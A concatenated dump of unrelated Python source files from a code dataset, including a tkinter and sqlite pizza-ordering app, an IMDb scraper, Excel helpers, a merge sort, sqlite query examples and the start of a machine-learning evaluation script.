key=lambda x: x[1], reverse = reverse)\n return [i[0] for i in sorting_list][0:number_to_return]\n\n#get parent, child, post data from db\n#allows user to only allow data from certai subreddits by passing list of elegible subreddit ids into it\ndef get_input():\n inputs = []\n count = 0\n df = pd.read_csv('SAD.csv', error_bad_lines=False)\n for index, row in df.iterrows():\n count += 1\n if count > max_results_to_analyze:\n break\n inputs.append([row[3], row[1]])\n\n return inputs\n\n#testing\nif __name__ == '__main__':\n sentiment_classifier = DNN_sentiment_classifier(save_model=False, load_eligible=False)\n\n\n","sub_path":"archive/sentiment_classifier.py","file_name":"sentiment_classifier.py","file_ext":"py","file_size_in_byte":12732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"30428284","text":"# Gets the IMDb and Metacritic Score from a movie page on IMDb.\n\nfrom bs4 import BeautifulSoup, SoupStrainer\nimport requests\nfrom fake_useragent import UserAgent\n\n\ndef imdb_meta(url):\n ua = UserAgent()\n headers = {'User-Agent': ua.chrome}\n\n # url = 'http://www.imdb.com/title/tt1375666/'\n\n r = requests.get(url, headers=headers)\n\n soup = BeautifulSoup(r.content, 'lxml', parse_only=SoupStrainer('div', id='pagecontent'))\n\n rating = soup.find('span', itemprop='ratingValue')\n # print(rating.text)\n\n meta_score = soup.find('div', class_='metacriticScore')\n # print(meta_score.text)\n\n imdb_rating = int(float(rating.text) * 10)\n if meta_score is not None:\n meta_rating = int(meta_score.text)\n else:\n meta_rating = 0\n return imdb_rating, meta_rating\n\n\n","sub_path":"ratings/imdb_rating.py","file_name":"imdb_rating.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"480611192","text":"# import unittest\n# import xlrd\nfrom openpyxl import load_workbook\nimport openpyexcel\n\n\n# class TC_Excel_utility(unittest.TestCase):\n\n# @staticmethod\ndef get_row_count(file,sheet_name):\n workbook = openpyexcel.load_workbook(file)\n sheet = workbook[sheet_name]\n # sheet = workbook.get_sheet_by_name(sheet_name)\n return sheet.max_row\n\n\n# @staticmethod\ndef get_column_count(file,sheet_name):\n workbook = openpyexcel.load_workbook(file)\n sheet = workbook[sheet_name]\n # sheet = workbook.get_sheet_by_name(sheet_name)\n return sheet.max_column\n\n\n# @staticmethod\ndef read_data(file,sheet_name,row_num,column_num):\n workbook = openpyexcel.load_workbook(file)\n sheet = workbook[sheet_name]\n # sheet = workbook.get_sheet_by_name(sheet_name)\n return sheet.cell(row=row_num,column=column_num).value\n\n\n# @staticmethod\ndef write_data(file,sheet_name,row_num,column_num,data):\n workbook = openpyexcel.load_workbook(file)\n sheet = workbook[sheet_name]\n # sheet = workbook.get_sheet_by_name(sheet_name)\n sheet.cell(row=row_num,column=column_num).value = data\n workbook.save(file)\n\n\n# @staticmethod\ndef delete_row(file,sheet_name,row_num,no_row_delete):\n try:\n workbook = openpyexcel.load_workbook(file)\n sheet = workbook[sheet_name]\n # sheet = workbook.get_sheet_by_name(sheet_name)\n sheet.delete_rows(row_num,no_row_delete)\n workbook.save(file)\n except Exception as e:\n print(\"In Delete_row method:\",type(e).__name__)\n\n\n'''this will return row and column index for to_serach string'''\n# @staticmethod\ndef find_row_col_as_per_serach_string(file,sheet_index,to_search_string):\n row_idx, col_idx = 0\n book = xlrd.open_workbook(file)\n sheet = book.sheet_by_index(sheet_index)\n for row_idx in range(sheet.nrows):\n row = sheet.row(row_idx)\n for col_idx, cell in enumerate(row):\n if cell.value == to_search_string:\n print(\"Sheet Name :\",sheet.name)\n print(\"Col Index:\",col_idx)\n print(\"Row Index:\",row_idx)\n return sheet.name,row_idx,col_idx\n\n # ws['B'] will retu\n # rn all cells on the B column until the last one\n # (similar to max_row but it's only for the B column)\n '''for cell in ws['A']:\n if cell.value is not None:\n if \"58986\" in str(cell.value):\n print('Found header with name: {} at row: {} and column: {}. In cell {}'.format(cell.value,cell.row,cell.column,cell))'''\n\n\n# @staticmethod\ndef search_value_in_column(file, sheet_name,search_string, column):\n wb = load_workbook(file)\n ws = wb[sheet_name]\n for row in range(1, ws.max_row + 1):\n coordinate = \"{}{}\".format(column, row)\n if ws[coordinate].value == search_string:\n return column, row\n return column, None\n\n\n# @staticmethod\ndef search_value_in_col_idx(file,sheet_name,search_string, col_idx=1):\n wb = load_workbook(file)\n ws = wb[sheet_name]\n for row in range(1, ws.max_row + 1):\n if ws[row][col_idx].value == search_string:\n return col_idx, row\n return col_idx, None\n\n\n# @staticmethod\ndef search_value_in_row_index(file,sheet_name, search_string, row=1):\n wb = load_workbook(file)\n ws = wb[sheet_name]\n for cell in ws[row]:\n if cell.value == search_string:\n return cell.column, row\n return None, row\n","sub_path":"utility/Excelutility.py","file_name":"Excelutility.py","file_ext":"py","file_size_in_byte":3373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"618325272","text":"import os\nimport yaml\nfrom Good_Boids_module.Update_Boids import Boids\n\nconfiguration_file = os.path.join(os.path.dirname(__file__), \"config_test.yaml\")\n\nget = Boids(configuration_file)\nbefore_positions = get.initial_positions().tolist()\nbefore_velocities = get.initial_velocities().tolist()\nafter_positions = get.update_positions().tolist()\nafter_velocities = get.update_velocities().tolist()\n\nfixture = {\"before_positions\": before_positions, \"before_velocities\": before_velocities,\n \"after_positions\": after_positions, \"after_velocities\": after_velocities}\nfixture_file = open(\"fixture.yaml\", 'w')\nfixture_file.write(yaml.dump(fixture))\nfixture_file.close()\n","sub_path":"Good_Boids_module/tests/record_fixtures.py","file_name":"record_fixtures.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"405024035","text":"\n\n#calss header\nclass _EARNER():\n\tdef __init__(self,): \n\t\tself.name = \"EARNER\"\n\t\tself.definitions = [u'someone or something that earns money: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_earner.py","file_name":"_earner.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"25725886","text":"def mergeSort(arr):\n\n\tlength = int(len(arr))\n\tmid= int(len(arr)/2)\n\n\tif length <2:\n\t\treturn arr\n\n\tleft = []\n\tright = []\n\n\tfor i in range(mid):\n\t\tleft.append(arr[i])\n\n\tfor j in range(length-mid):\n\t\tright.append(arr[mid+j])\n\n\t# print(left)\n\t# print(right)\n\n\tmergeSort(left)\n\tmergeSort(right)\n\tmerge(left, right, arr)\n\n\treturn arr\n\n\ndef merge(left, right, arr):\n\ti=0\n\tj=0\n\tk=0\n\n\tleft_len = len(left)\n\tright_len = len(right)\n\tarr_len = len(arr)\n\n\twhile i< left_len and j< right_len:\n\t\tif left[i] < right[j]:\n\t\t\tarr[k] = left[i]\n\t\t\ti +=1\n\t\telif left[i] > right[j]:\n\t\t\tarr[k] = right[j]\n\t\t\tj +=1\n\t\t\n\t\tk +=1\n\n\twhile i0:\r\n \t\t\tglobal username\r\n \t\t\tusername=res[0][1]\r\n \t\t\tglobal userid\r\n \t\t\tuserid=res[0][0]\r\n \t\t\tglobal email\r\n \t\t\temail=res[0][4]\r\n \t\t\tself.menu()\r\n \t\telse:\r\n \t\t\tmsgbox('Sorry Wrong Username password', 'Error')\r\n \texcept:\r\n \t\tmsgbox('Sorry User is not found', 'error')\r\n\r\n\r\n def regi(self, conn, fname, lname, user, pas, email, mobile):\r\n \tif fname.isalpha() and lname.isalpha():\r\n \t\tif mobile.isnumeric() and len(mobile)==10:\r\n \t\t\ttry:\r\n \t\t\t\tconn.execute(\"CREATE TABLE users (id integer primary key AUTOINCREMENT, username varchar(60) unique not null, lname varchar(60), fname varchar(60), email varchar(60), mobile int, password varchar(60) not null)\")\r\n \t\t\texcept:\r\n \t\t\t\tpass\r\n \t\t\ttry:\r\n \t\t\t\tif conn.execute(\"INSERT INTO users (username, lname, fname, email, mobile, password) VALUES (?,?,?,?,?,?)\", (user, lname, fname, email, mobile, pas)):\r\n \t\t\t\t\tmsgbox('User Created', 'Success')\r\n \t\t\t\t\tconn.commit()\r\n \t\t\t\t\tself.login()\r\n \t\t\t\telse:\r\n \t\t\t\t\tmsgbox('Some error occured', 'Error')\r\n \t\t\t\t\treturn False\r\n \t\t\texcept:\r\n \t\t\t\tmsgbox('Some error occured', 'Error')\r\n \t\t\t\treturn False\r\n \t\telse:\r\n \t\t\tmsgbox('Mobile should be 10 digit numeric value', 'Error')\r\n \t\t\treturn False\r\n \telse:\r\n \t\tmsgbox('Name will only be Aplhabet', 'Error')\r\n \t\treturn False;\r\n\r\n\r\n\r\n\r\n def validate(self, v1,v2,v3,v4,v5,v6):\r\n \t#print(v1)\r\n \t#print(type(v1))\r\n \tif (v1.isnumeric() or v1=='') and (v2.isnumeric() or v2=='') and (v3.isnumeric() or v3=='') and (v4.isnumeric() or v4=='') and (v5.isnumeric() or v5=='') and (v6.isnumeric() or v6==''):\r\n \t\tself.order()\r\n \telse:\r\n \t\tmsgbox('Please enter valid amount.', 'Error')\r\n\r\n\r\n def insertinto(self, v1, v2, v3, v4, v5, v6, sume, gst, total, conn=db):\r\n \ttry:\r\n \t\tconn.execute(\"CREATE TABLE orders (id integer primary key AUTOINCREMENT, user_id integer, username varchar(60), items varchar(300), total integer, Timestamp DATETIME DEFAULT CURRENT_TIMESTAMP)\")\r\n \texcept:\r\n \t\tpass\r\n \ttry:\r\n \t\tlis='Veg Pizza('+v1+'), Deluxe Veggie('+v2+'), Veg Vaganza('+v3+'), Pepper Pizza('+v4+'), Margherita('+v5+'), Cold Drink('+v6+'), SUM('+sume+'), GST('+gst+')'\r\n \t\tconn.execute(\"INSERT INTO orders (user_id, username, items, total) VALUES (?,?,?,?)\", (userid, username, lis, total))\r\n \t\tconn.commit()\r\n \texcept:\r\n \t\tmsgbox('Sorry Some error occured', 'Error')\r\n\r\n\r\n def home(self):\r\n self.scr=Tk(className=\"Pizza Management Home\")\r\n #self.scr1.destroy()\r\n self.scr.geometry(\"605x400\")\r\n self.fr=Frame(self.scr,height=618,width=1366)\r\n self.scr.resizable(False, False)\r\n self.lab3=Label(self.fr,text=\"LOGIN\",bg=\"white\",font=(\"cooper black\",20))\r\n self.lab3.place(x=160,y=30)\r\n self.lab1=Label(self.fr,text=\"Username\",bg=\"white\",font=(\"default\",20))\r\n self.lab1.place(x=30,y=100)\r\n self.lab2=Label(self.fr,text=\"Password\",bg=\"white\",font=(\"default\",20))\r\n self.lab2.place(x=30,y=150)\r\n self.user=Entry(self.fr,bg=\"white\",font=(\"default\",20))\r\n self.user.place(x=180,y=100)\r\n self.pasd=Entry(self.fr,bg=\"white\",font=(\"default\",20),show=\"*\")\r\n self.pasd.place(x=180,y=150)\r\n self.fr=Frame(self.scr,bg=\"blue\",height=618,width=1366)\r\n self.c=Canvas(self.fr,height=618,width=1366)\r\n self.c.pack()\r\n self.back=PhotoImage(file=\"pizzaback.png\")\r\n self.c.create_image(300,200,image=self.back)\r\n #self.c.create_image(683,284,image=self.back)\r\n self.st=Button(self.fr,text=\"login\",font=(\"default\",20),command=self.login)\r\n self.st.place(x=265,y=100)\r\n self.si=Button(self.fr,text=\"Register\",command=self.register,font=(\"default\",20))\r\n self.si.place(x=245,y=200)\r\n self.fr.pack(fill=BOTH,expand=1)\r\n self.scr.mainloop()\r\n def register(self):\r\n self.scr.destroy()\r\n self.scr1=Tk(className=\"Pizza Management Register\")\r\n self.fr=Frame(self.scr1,bg=\"DeepSkyBlue2\",height=550,width=650)\r\n self.lab3=Label(self.fr,text=\"Customer Registration\",bg=\"white\",font=(\"default\",20))\r\n self.lab3.place(x=250,y=50)\r\n\r\n self.lb1=Label(self.fr,text=\"First Name\",bg=\"#d3ede6\",font=(\"default\",20))\r\n self.lb1.place(x=80,y=120)\r\n self.first=Entry(self.fr,bg=\"white\",width=15,font=(\"default\",20),bd=5)\r\n self.first.place(x=250,y=120)\r\n self.lab2=Label(self.fr,text=\"Last Name\",bg=\"#d3ede6\",font=(\"default\",20))\r\n self.lab2.place(x=80,y=170)\r\n self.last=Entry(self.fr,bg=\"white\",width=15,font=(\"default\",20),bd=5)\r\n self.last.place(x=250,y=170)\r\n \r\n self.lab1=Label(self.fr,text=\"user name\",bg=\"#d3ede6\",font=(\"default\",20))\r\n self.lab1.place(x=80,y=220)\r\n self.lab2=Label(self.fr,text=\"password\",bg=\"#d3ede6\",font=(\"default\",20))\r\n self.lab2.place(x=80,y=270)\r\n self.user=Entry(self.fr,bg=\"white\",font=(\"default\",20),bd=5)\r\n self.user.place(x=250,y=220)\r\n self.pasd=Entry(self.fr,bg=\"white\",font=(\"default\",20),bd=5,show=\"*\")\r\n self.pasd.place(x=250,y=270)\r\n\r\n self.lab5=Label(self.fr,text=\"Email ID\",bg=\"#d3ede6\",font=(\"default\",20))\r\n self.lab5.place(x=80,y=320)\r\n self.email=Entry(self.fr,bg=\"white\",width=15,font=(\"default\",20),bd=5)\r\n self.email.place(x=250,y=320)\r\n self.lab6=Label(self.fr,text=\"Mobile No.\",bg=\"#d3ede6\",font=(\"default\",20))\r\n self.lab6.place(x=80,y=370)\r\n self.mob=Entry(self.fr,bg=\"white\",width=15,font=(\"default\",20),bd=5)\r\n self.mob.place(x=250,y=370)\r\n self.st=Button(self.fr,text=\"submit\",font=(\"default\",20),command=lambda : self.regi(db, self.first.get(), self.last.get(), self.user.get(), self.pasd.get(), self.email.get(), self.mob.get()))\r\n self.st.place(x=200,y=450)\r\n #self.hm=Button(self.fr,text=\"Home\",font=(\"default\",20),command=self.login)how to return from function in tkinter button\r\n #self.hm.place(x=300, y=450)\r\n self.si=Button(self.fr,text=\"clear\",command=self.clear,font=(\"default\",20))\r\n self.si.place(x=380,y=450) \r\n self.fr.pack(fill=BOTH,expand=1)\r\n self.scr.mainloop()\r\n def login(self):\r\n try:\r\n \tself.scr.destroy()\r\n except:\r\n \tpass\r\n try:\r\n \tself.scr1.destroy()\r\n except:\r\n \tpass\r\n self.scr1=Tk(className=\"Pizza Management Login\")\r\n self.fr=Frame(self.scr1,bg=\"DeepSkyBlue2\",height=400,width=600)\r\n self.lab3=Label(self.fr,text=\"Login\",bg=\"white\",font=(\"default\",20))\r\n self.lab3.place(x=250,y=50)\r\n self.lab1=Label(self.fr,text=\"user name\",bg=\"white\",font=(\"default\",20))\r\n self.lab1.place(x=80,y=120)\r\n self.lab2=Label(self.fr,text=\"password\",bg=\"white\",font=(\"default\",20))\r\n self.lab2.place(x=80,y=170)\r\n self.user=Entry(self.fr,bg=\"white\",font=(\"default\",20))\r\n self.user.place(x=250,y=120)\r\n self.pasd=Entry(self.fr,bg=\"white\",font=(\"default\",20),show=\"*\")\r\n self.pasd.place(x=250,y=170)\r\n self.st=Button(self.fr,text=\"submit\",font=(\"default\",20),command=lambda : self.loginv(self.user.get(), self.pasd.get()))\r\n self.st.place(x=200,y=250)\r\n self.si=Button(self.fr,text=\"clear\",command=self.clear,font=(\"default\",20))\r\n self.si.place(x=380,y=250)\r\n self.fr.pack(fill=BOTH,expand=1)\r\n self.scr.mainloop() \r\n def menu(self):\r\n self.scr1.destroy()\r\n self.roo=Tk(className=\"MENU\")\r\n self.roo.geometry(\"1000x1000\")\r\n self.fra=Frame(self.roo,bg=\"DeepSkyBlue2\",height=800,width=2000)\r\n self.roo.config(bg=\"DeepSkyBlue2\")\r\n self.c=Canvas(self.fra,height=600,width=600)\r\n self.c.pack()\r\n self.roo.title(\"MENU\")\r\n #self.widget = Label(self.fra, compound='top')\r\n #self.widget.pizza1 = PhotoImage(file=\"pizza1.jpg\")\r\n #self.widget['image'] = widget.pizza1\r\n #self.widget.pack()\r\n self.v1=IntVar()\r\n self.v2=IntVar()\r\n self.v3=IntVar()\r\n self.v4=IntVar()\r\n self.v5=IntVar()\r\n self.v6=IntVar()\r\n self.labe=Label(self.fra,text=\"ITEM\",bg=\"DeepSkyBlue2\",font=(\"cooper black\",20))\r\n self.labe.place(x=150,y=30)\r\n self.labe1=Label(self.fra,text=\"PRICE\",bg=\"DeepSkyBlue2\",font=(\"cooper black\",20))\r\n self.labe1.place(x=350,y=30)\r\n self.labe2=Label(self.fra,text=\"Veg Pizza\",bg=\"white\",font=(\"default\",16))\r\n self.labe2.place(x=140,y=85)\r\n self.labe3=Label(self.fra,text=\"₹250\",bg=\"white\",font=(\"default\",16))\r\n self.labe3.place(x=365,y=85)\r\n self.labe2=Label(self.fra,text=\"Deluxe Veggie\",bg=\"white\",font=(\"default\",16))\r\n self.labe2.place(x=125,y=115)\r\n self.labe3=Label(self.fra,text=\"₹250\",bg=\"white\",font=(\"default\",16))\r\n self.labe3.place(x=365,y=115)\r\n self.labe2=Label(self.fra,text=\"Veg Vaganza\",bg=\"white\",font=(\"default\",16))\r\n self.labe2.place(x=125,y=145)\r\n self.labe3=Label(self.fra,text=\"₹250\",bg=\"white\",font=(\"default\",16))\r\n self.labe3.place(x=365,y=145)\r\n self.labe2=Label(self.fra,text=\"Pepper Pizza\",bg=\"white\",font=(\"default\",16))\r\n self.labe2.place(x=125,y=175)\r\n self.labe3=Label(self.fra,text=\"₹250\",bg=\"white\",font=(\"default\",16))\r\n self.labe3.place(x=365,y=175)\r\n self.labe2=Label(self.fra,text=\"Margherita\",bg=\"white\",font=(\"default\",16))\r\n self.labe2.place(x=135,y=205)\r\n self.labe3=Label(self.fra,text=\"₹195\",bg=\"white\",font=(\"default\",16))\r\n self.labe3.place(x=365,y=205)\r\n self.labe4=Label(self.fra,text=\"Cold Drink\",bg=\"white\",font=(\"default\",16))\r\n self.labe4.place(x=135,y=235)\r\n self.labe5=Label(self.fra,text=\"₹40\",bg=\"white\",font=(\"default\",16))\r\n self.labe5.place(x=365,y=235)\r\n self.labe6=Label(self.fra,text=\"Place your order here:\",bg=\"DeepSkyBlue2\",font=(\"Cooper black\",16))\r\n self.labe6.place(x=155,y=280)\r\n self.lab7=Label(self.fra,text=\"Item\",bg=\"white\",font=(\"default\",16))\r\n self.lab7.place(x=120,y=315)\r\n self.lab8=Label(self.fra,text=\"Quantity\",bg=\"white\",font=(\"default\",16))\r\n self.lab8.place(x=280,y=315)\r\n self.lab9=Label(self.fra,text=\"Veg Pizza\",bg=\"white\",font=(\"default\",16))\r\n self.lab9.place(x=90,y=350)\r\n self.v1=Entry(self.fra,bg=\"white\",font=(\"default\",16))\r\n self.v1.place(x=230,y=350)\r\n self.lab10=Label(self.fra,text=\"Deluxe Pizza\",bg=\"white\",font=(\"default\",16))\r\n self.lab10.place(x=85,y=385)\r\n self.v2=Entry(self.fra,bg=\"white\",font=(\"default\",16))\r\n self.v2.place(x=230,y=385)\r\n self.lab11=Label(self.fra,text=\"Veg Vaganza\",bg=\"white\",font=(\"default\",16))\r\n self.lab11.place(x=85,y=420)\r\n self.v3=Entry(self.fra,bg=\"white\",font=(\"default\",16))\r\n self.v3.place(x=230,y=420)\r\n self.lab12=Label(self.fra,text=\"Pepper Pizza\",bg=\"white\",font=(\"default\",16))\r\n self.lab12.place(x=85,y=455)\r\n self.v4=Entry(self.fra,bg=\"white\",font=(\"default\",16))\r\n self.v4.place(x=230,y=455)\r\n self.lab13=Label(self.fra,text=\"Margherita\",bg=\"white\",font=(\"default\",16))\r\n self.lab13.place(x=90,y=490)\r\n self.v5=Entry(self.fra,bg=\"white\",font=(\"default\",16))\r\n self.v5.place(x=230,y=490)\r\n self.lab14=Label(self.fra,text=\"Cold Drink\",bg=\"white\",font=(\"default\",16))\r\n self.lab14.place(x=90,y=525)\r\n self.v6=Entry(self.fra,bg=\"white\",font=(\"default\",16))\r\n self.v6.place(x=230,y=525)\r\n self.to=Button(self.fra,text=\"Submit\",font=(\"cooper black\",20),bg=\"DeepSkyBlue3\",fg=\"black\",command=lambda: self.validate(self.v1.get(), self.v2.get(), self.v3.get(), self.v4.get(), self.v5.get(), self.v6.get()))\r\n self.to.place(x=250,y=565)\r\n self.to.pack(fill=BOTH,expand=1)\r\n self.fra.pack()\r\n self.roo.mainloop()\r\n def order(self):\r\n self.scr2=Tk(className=\"Place Order\")\r\n self.scr2.geometry(\"450x300\")\r\n self.scr2.resizable(False, False)\r\n self.scr2.title(\"Place Order\")\r\n self.scr2.config(bg=\"DeepSkyBlue2\")\r\n self.fram=Frame(self.scr2,height=618,width=1366,bg=\"DeepSkyBlue2\")\r\n #self.v1.set(\"0\")\r\n self.a=self.v1.get()\r\n self.b=self.v2.get()\r\n self.c=self.v3.get()\r\n self.d=self.v4.get()\r\n self.e=self.v5.get()\r\n self.f=self.v6.get()\r\n #print(self.a)\r\n if len(self.a)==0:\r\n self.a=\"0\"\r\n #print(self.a)\r\n if len(self.b)==0:\r\n self.b=\"0\"\r\n #print(self.b)\r\n if len(self.c)==0:\r\n self.c=\"0\"\r\n #print(self.c)\r\n if len(self.d)==0:\r\n self.d=\"0\"\r\n #print(self.d)\r\n if len(self.e)==0:\r\n self.e=\"0\"\r\n #print(self.e)\r\n if len(self.f)==0:\r\n self.f=\"0\"\r\n #print(self.f)\r\n #print(self.a)\r\n self.sum=int(self.a)*250+int(self.b)*250+int(self.c)*250+int(self.d)*250+int(self.e)*195+int(self.f)*40\r\n self.gst=(18/100)*int(self.sum)\r\n self.tot=int(self.gst)+int(self.sum)\r\n #self.tot=\"₹ \"+str(int(((self.a)*250)+((self.b)*250)+((self.c)*250)+((self.d)*250)+((self.e)*195)+((self.f)*40)))\r\n #print(self.sum)\r\n self.labell=Label(self.fram,text=\"Total payable amount is \",bg=\"DeepSkyblue2\",font=(\"default\",16))\r\n self.label2=Label(self.fram,text=\"GST(18%) \",bg=\"DeepSkyblue2\",font=(\"default\",16))\r\n self.label3=Label(self.fram,text=\"Total: \",bg=\"DeepSkyblue2\",font=(\"default\",16))\r\n self.labell.place(x=90,y=110)\r\n self.label2.place(x=90,y=70)\r\n self.label3.place(x=90,y=30)\r\n #self.dis=Entry(self.fram,text=\"%s\" %(self.tot),bg=\"white\",font=(\"default\",16))\r\n self.val=Label(self.fram,text=self.sum,bg=\"white\",font=(\"default\",16))\r\n self.val2=Label(self.fram,text=self.gst,bg=\"white\",font=(\"default\",16))\r\n self.val3=Label(self.fram,text=self.tot,bg=\"white\",font=(\"default\",16))\r\n self.insertinto(self.a, self.b, self.c, self.d, self.e, self.f, self.sum, self.gst, self.tot)\r\n self.val.place(x=320,y=110)\r\n self.val2.place(x=320,y=70)\r\n self.val3.place(x=320,y=30)\r\n self.fram.pack()\r\n self.scr.mainloop()\r\n\r\n def result(self):\r\n self.username=self.user.get()\r\n self.password=self.pasd.get()\r\n try:\r\n self.scr.destroy()\r\n except:\r\n try:\r\n self.scr1.destroy()\r\n except:\r\n pass\r\n def clear(self):\r\n self.user.delete(0,END)\r\n self.pasd.delete(0,END)\r\n def values(self):\r\n self.login()\r\n return self.username,self.password\r\n\r\na= Log()\r\na.home()\r\ndb.commit()\r\n","sub_path":"pizzamgmt.py","file_name":"pizzamgmt.py","file_ext":"py","file_size_in_byte":15703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"69874307","text":"import sqlite3\n\nclass DataAccess(object):\n db = r'C:\\Users\\Chris\\Documents\\GitHub\\CPE169P-Requirements\\Mod2_MP1\\sqlite_02\\chinook.db'\n def __init__(self):\n \"\"\" constructor \"\"\"\n self.conn = sqlite3.connect(self.db)\n self.cur = self.conn.cursor()\n def close(self):\n \"\"\" close db connection \"\"\"\n self.conn.close()\n def executeQuery(self,query):\n self.cur.execute(query)\n return self.cur.fetchall()\n \n def commit(self):\n \"\"\" commit changes to db \"\"\"\n self.conn.commit()\n\nif __name__=='__main__':\n da = DataAccess()\n if da is not None:\n print(da.executeQuery('SELECT InvoiceId, BillingAddress, \\\n Total FROM invoices\\\n WHERE Total BETWEEN 14.91 and 18.86 ORDER BY Total'))\n print(da.executeQuery('SELECT albumid, COUNT(trackid) \\\n FROM tracks GROUP BY albumid;'))\n print(da.executeQuery('SELECT Title, Name FROM albums\\\n INNER JOIN artists ON artists.ArtistId = albums.ArtistId;'))\n print(da.executeQuery('''SELECT trackid, name, albumid FROM tracks WHERE albumid = (SELECT albumid FROM albums WHERE title='Let There Be Rock');'''))\n print(da.executeQuery('''\n SELECT customerid,\n firstname,\n lastname\n FROM customers\n WHERE supportrepid IN (\n SELECT employeeid\n FROM employees\n WHERE country = 'Canada'\n );\n '''))\n \n \n\n","sub_path":"Mod2_MP1/sqlite_02/fetchdata.py","file_name":"fetchdata.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"166373440","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sys, os, math\nimport cv2 as cv\nimport Image\nfrom em import *\n\nif __name__ == \"__main__\":\n\n filename3 = sys.argv[1]\n filename4 = sys.argv[2]\n filename5 = sys.argv[3]\n mid = float(sys.argv[4])\n\n data3 = cv.imread(filename3).astype(np.double)\n data4 = cv.imread(filename4).astype(np.double)\n data5 = cv.imread(filename5).astype(np.double)\n\n data_city = (data5 - data4) / (data5 + data4)\n\n data_plnt = (data4 - data3) / (data4 + data3)\n data_plnt_flat = data_plnt[np.where(data_city < mid)].reshape((1,data_plnt[np.where(data_city < mid)].size))[0]\n np.random.shuffle(data_plnt_flat)\n em = expmax(data_plnt_flat[:40000], 3)\n\n ans = em.estimate()\n print(ans)\n plt.figure()\n em.draw()\n plt.show()\n\n","sub_path":"tool_old/detect_plnt.py","file_name":"detect_plnt.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"94891909","text":"import argparse\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.semi_supervised import label_propagation\r\nfrom sklearn.decomposition import TruncatedSVD\r\nfrom sklearn import metrics\r\nfrom sklearn.metrics import roc_curve,auc\r\nfrom keras.models import model_from_yaml\r\nfrom sklearn.naive_bayes import GaussianNB\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.ensemble import AdaBoostClassifier\r\nfrom keras import optimizers\r\nimport re\r\nfrom sklearn.model_selection import StratifiedShuffleSplit, train_test_split\r\nfrom sklearn.neural_network import MLPClassifier\r\nfrom sklearn.metrics import accuracy_score, recall_score, precision_score, f1_score\r\nfrom collections import defaultdict\r\nimport pickle\r\nimport random\r\nimport Extract_fe as data\r\nimport matplotlib.pyplot as plt\r\nimport pymrmr\r\n\r\n\r\n\r\ndef parse_args():\r\n parser = argparse.ArgumentParser()\r\n\r\n parser.add_argument(\r\n '-X', '--Xfile',\r\n help='File with X data',\r\n type=str,\r\n default=None,\r\n dest='X_filename'\r\n )\r\n\r\n parser.add_argument(\r\n '-y', '--yfile',\r\n help='File with y data',\r\n type=str,\r\n default=None,\r\n dest='y_filename'\r\n )\r\n\r\n parser.add_argument(\r\n '-an', '--add_n',\r\n type=int,\r\n default=1,\r\n help='Add n samples from pool per training loop (default: 1)',\r\n dest='add_n'\r\n )\r\n\r\n parser.add_argument(\r\n '-t', '--threshold',\r\n type=float,\r\n default=0.7,\r\n help='Desired threshold for accuracy on test set (default: 0.7)',\r\n dest='threshold'\r\n )\r\n\r\n return parser.parse_args()\r\n\r\n\r\ndef train_test_split_rand(X, y, test_size=0.2, seed=None):\r\n \"\"\"Split a dataset \\\\\\into training and test at random\r\n Parameters\r\n ----------\r\n X : np.array\r\n Features of the dataset\r\n y : np.array\r\n Labels of the dataset\r\n test_size : float, optional\r\n Percentage of data in test set, by default 0.2\r\n seed : int, optional\r\n Seed for Random State, by default None\r\n Returns\r\n -------\r\n X_train, X_test, y_train, y_test\r\n Splitted data\r\n \"\"\"\r\n\r\n # X = X.values\r\n # y = y.values\r\n\r\n # split\r\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=test_size, random_state=seed)\r\n\r\n # print(X_train.shape)\r\n return X_train, X_test, y_train, y_test\r\n\r\n\r\n\r\ndef calc_performance(y_test, pred_y, test_num,prefix=''):\r\n \"\"\"Calculate performance metrics between predicted labels and true labels\r\n Parameters\r\n ----------\r\n y_test : [type]\r\n [description]\r\n pred_y : [type]\r\n [description]\r\n prefix : str, optional\r\n [description], by default ''\r\n Returns\r\n -------\r\n [type]\r\n [description]\r\n \"\"\"\r\n tp = 0\r\n fp = 0\r\n tn = 0\r\n fn = 0\r\n for index in range(test_num):\r\n if y_test[index] == 1:\r\n if y_test[index] == pred_y[index]:\r\n tp = tp + 1\r\n else:\r\n fn = fn + 1\r\n else:\r\n if y_test[index] == pred_y[index]:\r\n tn = tn + 1\r\n else:\r\n fp = fp + 1\r\n # print('tp:', tp, 'fn:', fn, 'tn:', tn, 'fp:', fp)\r\n acc = (tp + tn) / (tp + tn+fp+fn)\r\n precision = precision_score(y_true=y_test, y_pred=pred_y, zero_division=0)\r\n recall=(tp) / (tp + fn)\r\n f1=2*precision*recall/(precision+recall)\r\n fpr, tpr, thresholds = roc_curve(y_test, pred_y) # probas_[:, 1])\r\n auc = metrics.auc(fpr, tpr)\r\n # auc=metrics.roc_auc_score(y_test, pred_y)\r\n # print(auc)\r\n print(f\"{prefix} Accuracy: {acc:.3f}, Recall: {recall:.3f}, Precision: {precision:.3f}, F1-score: {f1:.3f}, AUC: {auc:.3f}\",'tp:', tp, 'fn:', fn, 'tn:', tn, 'fp:', 